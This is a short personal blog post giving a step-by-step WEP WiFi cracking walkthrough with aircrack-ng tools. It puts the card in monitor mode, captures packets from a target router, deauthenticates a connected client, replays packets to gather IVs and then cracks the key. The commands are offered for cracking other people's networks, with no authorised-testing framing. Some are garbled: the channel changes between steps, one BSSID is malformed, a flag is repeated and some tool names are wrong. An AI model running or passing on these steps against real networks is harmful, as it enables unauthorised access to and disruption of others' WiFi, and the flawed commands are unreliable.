Since this blog turn into my own personal note, therefore, this WiFi cracking will become my future reference. With this method, I usually achieve my target, cracking WiFi with WEP encryption.
There are several type of WiFi encryption. They are :
- WEP
- WPA
- WPA2
Why we can crack WEP easily? Here.
We also can crack WPA, but its gonna take hell lots of time and we need dictionary too. Here.
Since we live in modern world, I believe, there is significant upgrade on the hardware part which make things easier for us. Such as CUDA. I had explained before here.
I don't have any screenshot with me now. So, I will just dump what inside my head.
1.
airmon-ng start wlan0
Put your wifi card on monitor mode. Result, you can see mon0 at the output.
2.
airodump mon0
Look at the output. Set your WEP target. Let's say 11:22:33:44. With ESSID "test" on channel 11
3.
airodump --bssid 11:22:33:44 --channel 6 -w test mon0
We will capture specific packet from bssid 11:22:33:44 on channel 6 and write (-w) the packet into file name called "test"
Leave it for a while until you found the associated client with the router. Lets say aa:bb:cc:dd. Open new terminal
4.
aireplay-ng -0 1 -a 11:22:33:44 -c aa:bb:cc:dd mon0
-0 stands for deauthenticate. U will deauthenticate the client to intercept their IV for cracking.
-a : bssid
-c : client associated to the bssid
Look at the output, you will see some XXX[12|120] <- this number is just an example.
5.aireplay-ng -3 -b 11:22:33:444 -b aa:bb:cc:dd mon0
We need to generate more packet to speed up our process. Leave it for awhile.
Check what is "-3"
New terminal
6.aircrack -n 128 --bssid 11:22:33:44 test*.cap
Depends on ur luck. But, as far as my experience, I need about 20k IVs to crack the password.
Just leave it, really.
Good luck.
0 comments:
Post a Comment